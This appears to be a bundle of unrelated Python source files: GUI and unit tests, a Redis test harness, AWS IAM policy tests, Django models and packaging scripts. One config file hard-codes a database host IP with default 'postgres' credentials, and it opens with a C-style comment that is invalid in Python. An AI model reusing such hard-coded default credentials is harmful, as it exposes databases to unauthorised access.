MOCK_OBJECT_GET_INVALID['access_methods'][0]['access_id'] = MOCK_ID
MOCK_OBJECT_POST = deepcopy(MOCK_OBJECT_POST_INVALID)
MOCK_OBJECT_POST['created_time'] = "2019-05-20T00:12:34-07:00"
MOCK_OBJECT_GET = deepcopy(MOCK_OBJECT_GET_INVALID)
MOCK_OBJECT_GET['created_time'] = "2019-05-20T00:12:34-07:00"
|
python
|
# Sikuli GUI test: restores three FLEx project backups in turn and compares
# dictionary/word/text views against reference screenshots.
from sikuli import *
import sys
sys.path.insert(0, '/home/vagrant/Integration-Testing-Framework/sikuli/examples')
from test_helper import TestHelper
import open_flex_from_backup, check_change

helper = TestHelper("run_tests_from_backups")
# reference screenshots to compare the rendered views against
folder = "/home/vagrant/Integration-Testing-Framework/sikuli/examples/images_for_comparison/"
# .fwbackup project archives to restore
backups_folder = "/home/vagrant/Integration-Testing-Framework/flex/projects/"

# Open Tagbanwa
open_flex_from_backup.open_backup(backups_folder + "Tagbanwa, Calamian 2015-07-07 1037 for testing purposes.fwbackup", True)
check_change.check_dictionary(folder + "Tagbanwa - dictionary.png")
check_change.check_word("dalik", folder + "Tagbanwa - dalik.png")  # IXTERMINATE
check_change.check_word("bugnawan", folder + "Tagbanwa - bugnawan.png")

# Open Kamasau
open_flex_from_backup.open_backup(backups_folder + "Kamasau 2015-07-07 1036 for testing purposes.fwbackup", True)
check_change.check_dictionary(folder + "Kamasau - dictionary.png")
check_change.check_word("chiraq", folder + "Kamasau - chiraq.png")  # like the French president in like the 2000s
check_change.check_word("gre", folder + "Kamasau - gre.png")

# Open Ayta Mag-Anchi
open_flex_from_backup.open_backup(backups_folder + "Ayta Mag-Anchi2 2015-07-07 1035 for testing purposes.fwbackup", True)
check_change.check_text("kulot2.ptx", folder + "Ayta - kulot2.ptx.png")

# Restart flex to hello project, closing the 3 windows
# we just opened + whatever was open before
helper.restart_flex()
|
python
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2020 CERN.
#
# Invenio-Records-Resources is free software; you can redistribute it and/or
# modify it under the terms of the MIT License; see LICENSE file for more
# details.
"""File service tests."""
from io import BytesIO
def test_file_flow(
        file_service, location, example_file_record, identity_simple):
    """Test the lifecycle of a file.

    - Initialize file saving
    - Save 1 files
    - Commit the files
    - List files of the record
    - Read file metadata
    - Retrieve a file
    - Delete a file
    - Delete all remaining files
    - List should be empty
    """
    recid = example_file_record['id']
    file_to_initialise = [{
        'key': 'article.txt',
        'checksum': 'md5:c785060c866796cc2a1708c997154c8e',
        'size': 17,  # bytes -- length of b'test file content' below
        'metadata': {
            'description': 'Published article PDF.',
        }
    }]
    # Initialize file saving
    result = file_service.init_files(
        recid, identity_simple, file_to_initialise)
    assert result.to_dict()['entries'][0]['key'] == \
        file_to_initialise[0]['key']

    # for to_file in to_files:
    content = BytesIO(b'test file content')
    result = file_service.set_file_content(
        recid, file_to_initialise[0]['key'], identity_simple, content,
        content.getbuffer().nbytes
    )
    # TODO figure response for successfully saved file
    assert result.to_dict()['key'] == file_to_initialise[0]['key']

    result = file_service.commit_file(
        recid, 'article.txt', identity_simple)
    # TODO currently there is no status in the json between the initialisation
    # and the commiting.
    assert result.to_dict()['key'] == \
        file_to_initialise[0]['key']

    # List files
    result = file_service.list_files(recid, identity_simple)
    assert result.to_dict()['entries'][0]['key'] == \
        file_to_initialise[0]['key']

    # Read file metadata
    result = file_service.read_file_metadata(
        recid, 'article.txt', identity_simple)
    assert result.to_dict()['key'] == \
        file_to_initialise[0]['key']

    # Retrieve file
    result = file_service.get_file_content(
        recid, 'article.txt', identity_simple)
    assert result.file_id == 'article.txt'

    # Delete file
    result = file_service.delete_file(
        recid, 'article.txt', identity_simple)
    assert result.file_id == 'article.txt'

    # Assert deleted
    result = file_service.list_files(recid, identity_simple)
    # NOTE(review): `result.entries` is truthy here even though the record
    # has no files left -- presumably it is a generator/lazy object; the
    # real emptiness check is the len() below. Confirm intent.
    assert result.entries
    assert len(list(result.entries)) == 0

    # Delete all remaining files
    result = file_service.delete_all_files(recid, identity_simple)
    assert list(result.entries) == []
|
python
|
# -*- coding:utf-8 -*-
from __future__ import unicode_literals
from future.builtins import object
from contextlib import contextmanager
import sys
import unittest
from redis import Redis
from limpyd.database import (RedisDatabase, DEFAULT_CONNECTION_SETTINGS)
# Run the test suite against a dedicated redis database (db 15), distinct
# from the default one, so flushdb() in setUp/tearDown can never wipe
# development data.
TEST_CONNECTION_SETTINGS = DEFAULT_CONNECTION_SETTINGS.copy()
TEST_CONNECTION_SETTINGS['db'] = 15

test_database = RedisDatabase(**TEST_CONNECTION_SETTINGS)
class LimpydBaseTest(unittest.TestCase):
    """Base TestCase for limpyd tests.

    Flushes the dedicated test redis database before and after each test,
    and provides helpers to count executed redis commands / stored keys
    and to exhaustively check collection slicing.
    """

    # number of redis commands issued by one lock acquire/release cycle
    COUNT_LOCK_COMMANDS = 4

    database = test_database

    @property
    def connection(self):
        # raw redis-py connection of the limpyd database
        return self.database.connection

    def setUp(self):
        # Ensure that we are on the right DB before flushing
        current_db_id = self.connection.connection_pool.connection_kwargs['db']
        assert current_db_id != DEFAULT_CONNECTION_SETTINGS['db']
        assert current_db_id == TEST_CONNECTION_SETTINGS['db']
        self.connection.flushdb()

    def tearDown(self):
        self.connection.flushdb()

    def count_commands(self):
        """
        Helper method to only count redis commands that work on keys (ie ignore
        commands like info...)
        """
        return self.connection.info()['total_commands_processed']

    def count_keys(self):
        """
        Helper method to return the number of keys in the test database
        """
        return self.connection.dbsize()

    def assertNumCommands(self, num=None, func=None, *args, **kwargs):
        """
        A context assert, to use with "with":
            with self.assertNumCommands(2):
                obj.field.set(1)
                obj.field.get()

        May also be called with a callable ``func`` instead of being used
        as a context manager.
        NOTE(review): *args/**kwargs are forwarded both to the context
        (min_num/max_num/checkpoints) and to ``func`` -- confirm that this
        sharing is intended.
        """
        context = _AssertNumCommandsContext(self, num, *args, **kwargs)
        if func is None:
            return context

        # Basically emulate the `with` statement here.
        context.__enter__()
        try:
            func(*args, **kwargs)
        except:
            context.__exit__(*sys.exc_info())
            raise
        else:
            context.__exit__(*sys.exc_info())

    if not hasattr(unittest.TestCase, 'subTest'):
        @contextmanager
        def subTest(self, msg=None, **params):
            # support for the `subTest` command not available before python 3.4
            # does nothing except running included test
            yield

    def assertSlicingIsCorrect(self, collection, check_data, check_only_length=False, limit=5):
        """Test a wide range of slicing of the given collection, compared to a python list

        Parameters
        ----------
        collection: Collection
            The collection to test. Should not have been sliced yet
        check_data: list
            The python list containing the same values as the limpyd collection.
            The result of slicing the collection will be compared to the result of slicing
            this list
        check_only_length: bool
            Default to ``False``. When ``True``, only the length of the slicing of the collection
            is compared to the slicing of the python list. To be used only when resulting content
            cannot be assured (for unsorted collections)
        limit: int
            Default to ``5``, it's the boundary of the slicing ranges that will be tested.
            ``5`` means will use all values from ``-5`` to ``5`` for each of the three parts
            of the slicing.
        """
        # check we have the correct dataset
        if check_only_length:
            assert len(collection) == len(check_data), 'Wrong dataset for this test'
        else:
            assert sorted(collection) == check_data, 'Wrong dataset for this test'

        # do all the slices
        for start in list(range(-limit, limit+1)) + [None]:
            for stop in list(range(-limit, limit+1)) + [None]:
                for step in range(-limit, limit+1):
                    if not step:
                        # a zero step is invalid for slicing
                        continue
                    expected = check_data[start:stop:step]
                    # test both the collection itself and a clone of it
                    for test_collection, clone in ((collection, False), (collection.clone(), True)):
                        with self.subTest(Start=start, Stop=stop, step=step, clone=clone):
                            sliced_collection = test_collection[start:stop:step]
                            if not check_only_length:
                                self.assertEqual(
                                    list(sliced_collection),
                                    expected,
                                    'Unexpected result for `%s:%s:%s`' % (
                                        '' if start is None else start,
                                        '' if stop is None else stop,
                                        '' if step is None else step,
                                    )
                                )
                            self.assertEqual(
                                len(sliced_collection),
                                len(expected),
                                'Unexpected length result for `%s:%s:%s`' % (
                                    '' if start is None else start,
                                    '' if stop is None else stop,
                                    '' if step is None else step,
                                )
                            )
class _AssertNumCommandsContext(object):
    """
    A context manager that counts the redis commands executed in its body
    and asserts the count equals ``num`` (or lies within
    ``min_num``/``max_num``).

    When ``checkpoints`` is True, extra GET commands with recognizable key
    names are issued at enter/exit (and on failure) so the boundaries are
    visible in a redis MONITOR trace; these extra commands are excluded
    from the count.
    """
    def __init__(self, test_case, num=None, min_num=None, max_num=None, checkpoints=False):
        self.test_case = test_case
        # exactly one of (num) or (min_num/max_num) must be provided
        if num is None and min_num is None and max_num is None:
            raise ValueError('If `num` is not passed, `min_num` or `max_num` are expected')
        if num is not None and (min_num is not None or max_num is not None):
            raise ValueError('If `num` is passed, `min_num` and `max_num` are not expected')
        self.num = num
        self.min_num = min_num
        self.max_num = max_num
        self.checkpoints = checkpoints
        # template for the checkpoint key names sent to redis
        self.log = 'ASSERT-NUM-COMMANDS-%s'
        if self.num is not None:
            self.log += '---EQ-%d' % self.num
        if self.min_num is not None:
            self.log += '---MIN-%d' % self.min_num
        if self.max_num is not None:
            self.log += '---MAX-%d' % self.max_num

    def __enter__(self):
        self.starting_commands = self.test_case.count_commands()
        if self.checkpoints:
            # marker visible in a redis MONITOR trace
            self.test_case.connection.get(self.log % 'START')
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # don't assert anything if the body raised
        if exc_type is not None:
            return
        if self.checkpoints:
            self.test_case.connection.get(self.log % 'END')
        # we remove 1 to ignore the "info" called in __enter__
        final_commands = self.test_case.count_commands() - 1
        # also two for checkpoints
        if self.checkpoints:
            final_commands = final_commands - 2
        executed = final_commands - self.starting_commands
        if self.checkpoints and executed != self.num:
            # extra marker so the failure is also visible in MONITOR
            self.test_case.connection.get((self.log % 'END') + '---FAILED-%s' % executed)
        if self.num is not None:
            self.test_case.assertEqual(
                executed, self.num, "%d commands executed, %d expected" % (
                    executed, self.num
                )
            )
        elif self.max_num is None:
            self.test_case.assertTrue(
                executed >= self.min_num, "%d commands executed, at least %d expected" % (
                    executed, self.min_num
                )
            )
        elif self.min_num is None:
            self.test_case.assertTrue(
                executed <= self.max_num, "%d commands executed, at max %d expected" % (
                    executed, self.max_num
                )
            )
        else:
            self.test_case.assertTrue(
                self.min_num <= executed <= self.max_num, "%d commands executed, expected to be at least %d and at max %d" % (
                    executed, self.min_num, self.max_num
                )
            )
|
python
|
from .newton_divided_differences import NewtonDifDiv
from .larange import Larange
from .linear_spline import LinearSpline
from .quadratic_spline import QuadraticSpline
from .cubic_spline import CubicSpline
|
python
|
/*
* Copyright (c) 2020 Huawei Technologies Co.,Ltd.
*
* openGauss is licensed under Mulan PSL v2.
* You can use this software according to the terms and conditions of the Mulan PSL v2.
* You may obtain a copy of Mulan PSL v2 at:
*
* http://license.coscl.org.cn/MulanPSL2
*
* THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
* EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
* MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
* See the Mulan PSL v2 for more details.
*/
# -*- coding: utf-8 -*-
"""
desciption: system variables or other constant information
"""
import os
import requests
import argparse
# Database connection and workload settings for the rewrite experiments.
# NOTE(review): credentials and host are hard-coded; move them to
# environment variables or a non-committed config file before sharing.
CONFIG = {
    'url': 'jdbc:postgresql://166.111.121.62:5432/',
    'host': '166.111.121.62',
    'port': 5432,
    'driver': 'org.postgresql.Driver',
    'username': 'postgres',
    'password': 'postgres',
    'schema': 'tpch1x',
    'sqldir': 'tpch',       # directory holding the benchmark SQL queries
    'logdir': 'rewrite_results'  # directory for rewrite result logs
}
class model_parameters():
    """Default hyper-parameters for the model; each one is exposed as an
    instance attribute (cuda, fastmode, seed, epochs, lr, weight_decay,
    hidden, dropout)."""

    # attribute name -> default value
    _DEFAULTS = dict(
        cuda=False,
        fastmode=False,
        seed=42,
        epochs=100,
        lr=0.01,
        weight_decay=5e-4,
        hidden=16,
        dropout=0.5,
    )

    def __init__(self):
        for name, value in self._DEFAULTS.items():
            setattr(self, name, value)
def parse_cmd_args(argv=None):
    """Parse the benchmark command-line options.

    Args:
        argv: optional list of argument strings. Defaults to ``None``,
            in which case argparse reads ``sys.argv[1:]`` -- the previous
            behaviour, so existing callers are unaffected; passing a list
            makes the function usable (and testable) without touching the
            process arguments.

    Returns:
        dict mapping option names to their parsed values.
    """
    parser = argparse.ArgumentParser()
    # benchmark
    parser.add_argument('--iteration_num', type=int, default=230, help='')
    parser.add_argument('--workload_num', type=int, default=3184, help='The number of queries')
    parser.add_argument('--feature_num', type=int, default=2, help='The number of vertex features')
    parser.add_argument('--node_dim', type=int, default=30, help='The size of intermediate network layers')
    args = parser.parse_args(argv)
    argus = vars(args)
    return argus
|
python
|
from setuptools import setup, find_packages
# Packaging metadata for the "arranger" CLI tool, which moves files into
# directories chosen from their extensions.
setup(
    name='arranger',
    version='1.1.2',
    description="moves each file to its appropriate directory based on the file's extension.",
    author='j0eTheRipper',
    author_email='[email protected]',
    url='https://github.com/j0eTheRipper/arranger',
    # installed as an executable script on PATH
    scripts=['src/arrange'],
    packages=['engine', 'engine.Extensions', 'engine.File', 'engine.DIR'],
    # package sources live under src/
    package_dir={'engine': 'src/engine'},
)
|
python
|
"""
Copyright 2018 Duo Security
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
---------------------------------------------------------------------------
"""
import sys
import unittest
from unittest.mock import patch
from io import StringIO
from contextlib import contextmanager
from cloudtracker import (get_role_allowed_actions,
get_role_iam,
make_list,
normalize_api_call,
print_actor_diff,
print_diff,
Privileges,
read_aws_api_list)
@contextmanager
def capture(command, *args, **kwargs):
    """Run *command* and yield everything it wrote to stdout as a string."""
    original_stdout = sys.stdout
    sys.stdout = StringIO()
    try:
        command(*args, **kwargs)
        # rewind the buffer so the whole output can be read back
        sys.stdout.seek(0)
        yield sys.stdout.read()
    finally:
        sys.stdout = original_stdout
class TestCloudtracker(unittest.TestCase):
    """Test class for cloudtracker"""
    # NOTE: ``assertEquals`` (with an "s") is a deprecated alias that was
    # removed in Python 3.12; ``assertEqual`` is used throughout instead.
    aws_api_list = None

    def __init__(self, *args, **kwargs):
        super(TestCloudtracker, self).__init__(*args, **kwargs)
        self.aws_api_list = read_aws_api_list()

    def test_make_list(self):
        """Test make_list"""
        self.assertEqual(["hello"], make_list("hello"))

    def test_get_actions_from_statement(self):
        """Test get_actions_from_statement"""
        privileges = Privileges(self.aws_api_list)

        stmt = {"Action": ["s3:PutObject"], "Resource": "*", "Effect": "Allow"}
        self.assertEqual(privileges.get_actions_from_statement(stmt),
                         {'s3:putobject': True})

        # wildcard suffixes expand to every matching API action
        stmt = {"Action": ["s3:PutObject*"], "Resource": "*", "Effect": "Allow"}
        self.assertEqual(privileges.get_actions_from_statement(stmt),
                         {'s3:putobject': True, 's3:putobjectacl': True, 's3:putobjecttagging': True})

        stmt = {"Action": ["s3:*ObjectT*"], "Resource": "*", "Effect": "Allow"}
        self.assertEqual(privileges.get_actions_from_statement(stmt),
                         {'s3:deleteobjecttagging': True,
                          's3:getobjecttagging': True,
                          's3:getobjecttorrent': True,
                          's3:putobjecttagging': True})

    def test_policy(self):
        """Test having multiple statements, some allowed, some denied"""
        privileges = Privileges(self.aws_api_list)

        # Create a privilege object with some allowed and denied
        stmt = {"Action": ["s3:*ObjectT*"], "Resource": "*", "Effect": "Allow"}
        privileges.add_stmt(stmt)
        stmt = {'Action': ['s3:GetObjectTagging', 's3:GetObjectTorrent'],
                "Resource": "*",
                "Effect": "Deny"}
        privileges.add_stmt(stmt)
        self.assertEqual(sorted(privileges.determine_allowed()),
                         sorted(['s3:putobjecttagging', 's3:deleteobjecttagging']))

    def test_get_actions_from_statement_with_resources(self):
        """
        Test that even when we are denied access to one resource,
        the actions are still marked as allowed.
        """
        privileges = Privileges(self.aws_api_list)
        policy = [
            {
                "Action": "s3:*",
                "Effect": "Allow",
                "Resource": "*"
            },
            {
                "Action": "s3:CreateBucket",
                "Effect": "Deny",
                "Resource": "*"
            },
            {
                "Action": "s3:*",
                "Effect": "Deny",
                "Resource": [
                    "arn:aws:s3:::super-sensitive-bucket",
                    "arn:aws:s3:::super-sensitive-bucket/*"
                ]
            }
        ]
        for stmt in policy:
            privileges.add_stmt(stmt)
        self.assertTrue('s3:deletebucket' in privileges.determine_allowed())
        self.assertTrue('s3:createbucket' not in privileges.determine_allowed())

    def test_get_actions_from_statement_with_array_of_resources(self):
        """
        Test array of resources
        """
        privileges = Privileges(self.aws_api_list)
        policy = [
            {
                "Action": "s3:*",
                "Effect": "Allow",
                "Resource": "*"
            },
            {
                "Action": "s3:CreateBucket",
                "Effect": "Deny",
                "Resource": ["arn:aws:s3:::super-sensitive-bucket", "*"]
            }
        ]
        for stmt in policy:
            privileges.add_stmt(stmt)
        self.assertTrue('s3:deletebucket' in privileges.determine_allowed())
        self.assertTrue('s3:createbucket' not in privileges.determine_allowed())

    def test_get_actions_from_statement_with_conditions(self):
        """
        Test that even when we are denied access based on a condition,
        the actions are still marked as allowed.
        """
        privileges = Privileges(self.aws_api_list)
        policy = [
            {
                "Sid": "AllowAllActionsForEC2",
                "Effect": "Allow",
                "Action": "ec2:*",
                "Resource": "*"
            },
            {
                "Sid": "DenyStopAndTerminateWhenMFAIsNotPresent",
                "Effect": "Deny",
                "Action": [
                    "ec2:StopInstances",
                    "ec2:TerminateInstances"
                ],
                "Resource": "*",
                "Condition": {"BoolIfExists": {"aws:MultiFactorAuthPresent": False}}
            }
        ]
        for stmt in policy:
            privileges.add_stmt(stmt)
        self.assertTrue('ec2:startinstances' in privileges.determine_allowed())
        self.assertTrue('ec2:stopinstances' in privileges.determine_allowed())

    def test_normalize_api_call(self):
        """Test normalize_api_call"""
        # Ensure the numbers at the end are removed
        self.assertEqual(normalize_api_call('lambda', 'ListTags20170331'), 'lambda:listtags')
        # Ensure service renaming occurs
        self.assertEqual(normalize_api_call('monitoring', 'DescribeAlarms'), 'cloudwatch:describealarms')

    def test_print_actor_diff(self):
        """Test print_actor_diff"""
        with capture(print_actor_diff, [], [], False) as output:
            self.assertEqual('', output)

        # Test output when you have 3 configured users, but only two actually did anything
        with capture(print_actor_diff, ['alice', 'bob'], ['alice', 'bob', 'charlie'], False) as output:
            self.assertEqual('  alice\n  bob\n- charlie\n', output)

    def test_print_diff(self):
        """Test print_diff"""
        with capture(print_diff, [], [], {}, False) as output:
            self.assertEqual('', output)

        def mocked_is_recorded_by_cloudtrail(action):
            """Instead of reading the whole file, just cherry pick this one action used in the tests"""
            if action == 's3:putobject':
                return False
            return True

        # One action allowed, and performed, and should be shown
        with patch('cloudtracker.is_recorded_by_cloudtrail', side_effect=mocked_is_recorded_by_cloudtrail):
            with capture(print_diff,
                         ['s3:createbucket'],  # performed
                         ['s3:createbucket'],  # allowed
                         {'show_benign': True, 'show_used': False, 'show_unknown': True}, False) as output:
                self.assertEqual('  s3:createbucket\n', output)

        # 3 actions allowed, one is used, one is unused, and one is unknown; show all
        with patch('cloudtracker.is_recorded_by_cloudtrail', side_effect=mocked_is_recorded_by_cloudtrail):
            with capture(print_diff,
                         ['s3:createbucket', 'sts:getcalleridentity'],  # performed
                         ['s3:createbucket', 's3:putobject', 's3:deletebucket'],  # allowed
                         {'show_benign': True, 'show_used': False, 'show_unknown': True}, False) as output:
                self.assertEqual('  s3:createbucket\n- s3:deletebucket\n? s3:putobject\n', output)

        # Same as above, but only show the used one
        with patch('cloudtracker.is_recorded_by_cloudtrail', side_effect=mocked_is_recorded_by_cloudtrail):
            with capture(print_diff,
                         ['s3:createbucket', 'sts:getcalleridentity'],  # performed
                         ['s3:createbucket', 's3:putobject', 's3:deletebucket'],  # allowed
                         {'show_benign': True, 'show_used': True, 'show_unknown': True}, False) as output:
                self.assertEqual('  s3:createbucket\n', output)

        # Hide the unknown
        with patch('cloudtracker.is_recorded_by_cloudtrail', side_effect=mocked_is_recorded_by_cloudtrail):
            with capture(print_diff,
                         ['s3:createbucket', 'sts:getcalleridentity'],  # performed
                         ['s3:createbucket', 's3:putobject', 's3:deletebucket'],  # allowed
                         {'show_benign': True, 'show_used': False, 'show_unknown': False}, False) as output:
                self.assertEqual('  s3:createbucket\n- s3:deletebucket\n', output)

    # Role IAM policy to be used in different tests
    role_iam = {
        "AssumeRolePolicyDocument": {},
        "RoleId": "AROA00000000000000000",
        "CreateDate": "2017-01-01T00:00:00Z",
        "InstanceProfileList": [],
        "RoleName": "test_role",
        "Path": "/",
        "AttachedManagedPolicies": [],
        "RolePolicyList": [
            {
                "PolicyName": "KmsDecryptSecrets",
                "PolicyDocument": {
                    "Version": "2012-10-17",
                    "Statement": [
                        {
                            "Action": [
                                "kms:DescribeKey",
                                "kms:Decrypt"
                            ],
                            "Resource": "*",
                            "Effect": "Allow",
                            "Sid": ""
                        }
                    ]
                }
            },
            {
                "PolicyName": "S3PutObject",
                "PolicyDocument": {
                    "Version": "2012-10-17",
                    "Statement": [
                        {
                            "Action": [
                                "s3:PutObject",
                                "s3:PutObjectAcl",
                                "s3:ListBucket"
                            ],
                            "Resource": "*",
                            "Effect": "Allow"
                        }
                    ]
                }
            }
        ],
        "Arn": "arn:aws:iam::111111111111:role/test_role"
    }

    def test_get_role_iam(self):
        """Test get_role_iam"""
        account_iam = {
            "RoleDetailList": [self.role_iam],
            "UserDetailList": [],
            "GroupDetailList": [],
            "Policies": []
        }
        self.assertEqual(self.role_iam, get_role_iam("test_role", account_iam))

    def test_get_role_allowed_actions(self):
        """Test get_role_allowed_actions"""
        account_iam = {
            "RoleDetailList": [self.role_iam],
            "UserDetailList": [],
            "GroupDetailList": [],
            "Policies": []
        }
        aws_api_list = read_aws_api_list()
        self.assertEqual(sorted(['s3:putobject', 'kms:describekey', 'kms:decrypt', 's3:putobjectacl']),
                         sorted(get_role_allowed_actions(aws_api_list, self.role_iam, account_iam)))
|
python
|
from django.apps import AppConfig
class ProntuariomedicoConfig(AppConfig):
    """Django application configuration for the prontuarioMedico app."""

    name = 'prontuarioMedico'
|
python
|
"""
Enables the user to add an "Image" plugin that displays an image
using the HTML <img> tag.
"""
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import models
from django.utils.translation import gettext
from django.utils.translation import gettext_lazy as _
from cms.models import CMSPlugin
from cms.models.fields import PageField
from djangocms_attributes_field.fields import AttributesField
from easy_thumbnails.files import get_thumbnailer
from filer.fields.image import FilerImageField
from filer.models import ThumbnailOption
# add setting for picture alignment, renders a class or inline styles
# depending on your template setup
def get_alignment():
    """Return the image-alignment choices for the picture plugin.

    Reads ``DJANGOCMS_PICTURE_ALIGN`` from the project settings, falling
    back to left/right/center. Depending on the template setup, the
    chosen value renders as a CSS class or inline styles.
    """
    fallback_choices = (
        ('left', _('Align left')),
        ('right', _('Align right')),
        ('center', _('Align center')),
    )
    return getattr(settings, 'DJANGOCMS_PICTURE_ALIGN', fallback_choices)
# Add additional choices through the ``settings.py``.
def get_templates():
    """Return the template choices; projects extend them through the
    ``DJANGOCMS_PICTURE_TEMPLATES`` setting."""
    choices = [('default', _('Default'))]
    # extend() accepts any iterable, so the setting may be a list or tuple
    choices.extend(getattr(settings, 'DJANGOCMS_PICTURE_TEMPLATES', []))
    return choices
# use golden ratio as default (https://en.wikipedia.org/wiki/Golden_ratio)
PICTURE_RATIO = getattr(settings, 'DJANGOCMS_PICTURE_RATIO', 1.6180)

# required for backwards compatibility
PICTURE_ALIGNMENT = get_alignment()

# choices for the "target" attribute of the rendered link
LINK_TARGET = (
    ('_blank', _('Open in new window')),
    ('_self', _('Open in same window')),
    ('_parent', _('Delegate to parent')),
    ('_top', _('Delegate to top')),
)

# per-plugin override of the global responsive-images setting
RESPONSIVE_IMAGE_CHOICES = (
    ('inherit', _('Let settings.DJANGOCMS_PICTURE_RESPONSIVE_IMAGES decide')),
    ('yes', _('Yes')),
    ('no', _('No')),
)
class AbstractPicture(CMSPlugin):
    """
    Renders an image with the option of adding a link
    """
    template = models.CharField(
        verbose_name=_('Template'),
        choices=get_templates(),
        default=get_templates()[0][0],
        max_length=255,
    )
    # uploaded image managed by django-filer
    picture = FilerImageField(
        verbose_name=_('Image'),
        blank=True,
        null=True,
        on_delete=models.SET_NULL,
        related_name='+',
    )
    # alternative to `picture`: hotlink an image by URL
    external_picture = models.URLField(
        verbose_name=_('External image'),
        blank=True,
        null=True,
        max_length=255,
        help_text=_(
            'If provided, overrides the embedded image. '
            'Certain options such as cropping are not applicable to external images.'
        )
    )
    width = models.PositiveIntegerField(
        verbose_name=_('Width'),
        blank=True,
        null=True,
        help_text=_(
            'The image width as number in pixels. '
            'Example: "720" and not "720px".'
        ),
    )
    height = models.PositiveIntegerField(
        verbose_name=_('Height'),
        blank=True,
        null=True,
        help_text=_(
            'The image height as number in pixels. '
            'Example: "720" and not "720px".'
        ),
    )
    alignment = models.CharField(
        verbose_name=_('Alignment'),
        choices=get_alignment(),
        blank=True,
        max_length=255,
        help_text=_('Aligns the image according to the selected option.'),
    )
    caption_text = models.TextField(
        verbose_name=_('Caption text'),
        blank=True,
        null=True,
        help_text=_('Provide a description, attribution, copyright or other information.')
    )
    # free-form HTML attributes for the <img> tag (src/width/height reserved)
    attributes = AttributesField(
        verbose_name=_('Attributes'),
        blank=True,
        excluded_keys=['src', 'width', 'height'],
    )
    # link models
    link_url = models.URLField(
        verbose_name=_('External URL'),
        blank=True,
        null=True,
        max_length=2040,
        help_text=_('Wraps the image in a link to an external URL.'),
    )
    link_page = PageField(
        verbose_name=_('Internal URL'),
        blank=True,
        null=True,
        on_delete=models.SET_NULL,
        help_text=_('Wraps the image in a link to an internal (page) URL.'),
    )
    link_target = models.CharField(
        verbose_name=_('Link target'),
        choices=LINK_TARGET,
        blank=True,
        max_length=255,
    )
    # free-form HTML attributes for the wrapping <a> tag
    link_attributes = AttributesField(
        verbose_name=_('Link attributes'),
        blank=True,
        excluded_keys=['href', 'target'],
    )
    # cropping models
    # active per default
    use_automatic_scaling = models.BooleanField(
        verbose_name=_('Automatic scaling'),
        blank=True,
        default=True,
        help_text=_('Uses the placeholder dimensions to automatically calculate the size.'),
    )
    # ignores all other cropping options
    # throws validation error if other cropping options are selected
    use_no_cropping = models.BooleanField(
        verbose_name=_('Use original image'),
        blank=True,
        default=False,
        help_text=_('Outputs the raw image without cropping.'),
    )
    # upscale and crop work together
    # throws validation error if other cropping options are selected
    use_crop = models.BooleanField(
        verbose_name=_('Crop image'),
        blank=True,
        default=False,
        help_text=_('Crops the image according to the thumbnail settings provided in the template.'),
    )
    use_upscale = models.BooleanField(
        verbose_name=_('Upscale image'),
        blank=True,
        default=False,
        help_text=_('Upscales the image to the size of the thumbnail settings in the template.')
    )
    use_responsive_image = models.CharField(
        verbose_name=_('Use responsive image'),
        max_length=7,
        choices=RESPONSIVE_IMAGE_CHOICES,
        default=RESPONSIVE_IMAGE_CHOICES[0][0],
        help_text=_(
            'Uses responsive image technique to choose better image to display based upon screen viewport. '
            'This configuration only applies to uploaded images (external pictures will not be affected). '
        )
    )
    # overrides all other options
    # throws validation error if other cropping options are selected
    thumbnail_options = models.ForeignKey(
        ThumbnailOption,
        verbose_name=_('Thumbnail options'),
        blank=True,
        null=True,
        help_text=_('Overrides width, height, and crop; scales up to the provided preset dimensions.'),
        on_delete=models.CASCADE,
    )
    # Add an app namespace to related_name to avoid field name clashes
    # with any other plugins that have a field with the same name as the
    # lowercase of the class name of this model.
    # https://github.com/divio/django-cms/issues/5030
    cmsplugin_ptr = models.OneToOneField(
        CMSPlugin,
        related_name='%(app_label)s_%(class)s',
        parent_link=True,
        on_delete=models.CASCADE,
    )

    class Meta:
        abstract = True
def __str__(self):
if self.picture and self.picture.label:
return self.picture.label
return str(self.pk)
def get_short_description(self):
if self.external_picture:
return self.external_picture
if self.picture and self.picture.label:
return self.picture.label
return gettext('<file is missing>')
    def copy_relations(self, oldinstance):
        """Carry the image reference over when django CMS copies the plugin."""
        # Because we have a ForeignKey, it's required to copy over
        # the reference from the instance to the new plugin.
        self.picture = oldinstance.picture
    def get_size(self, width=None, height=None):
        """Build the thumbnailing options for this plugin.

        Precedence for dimensions: an explicit ThumbnailOption preset wins;
        otherwise the manual width/height fields when automatic scaling is
        off; otherwise the width/height arguments (the placeholder size).
        A single missing dimension is derived from the other via the golden
        ratio; when both are missing, the raw picture size is used.

        Returns a dict with 'size' (width, height), 'crop' and 'upscale'.
        """
        crop = self.use_crop
